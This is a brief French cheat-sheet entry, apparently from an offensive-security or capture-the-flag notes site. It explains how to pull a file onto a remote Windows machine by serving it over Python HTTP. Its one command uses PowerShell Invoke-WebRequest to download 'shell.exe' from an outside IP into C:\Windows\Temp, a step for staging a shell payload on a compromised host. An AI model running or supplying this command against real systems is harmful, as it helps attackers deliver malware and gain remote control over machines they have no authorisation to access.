⬇️Télécharger un fichier sur windows
Faire un serveur http avec python puis taper cette commande sur la machine windows distante:
powershell -c "Invoke-WebRequest -Uri 'http://10.8.112.175:8000/shell.exe' -Outfile 'C:\Windows\Temp\shell.exe'"

Last updated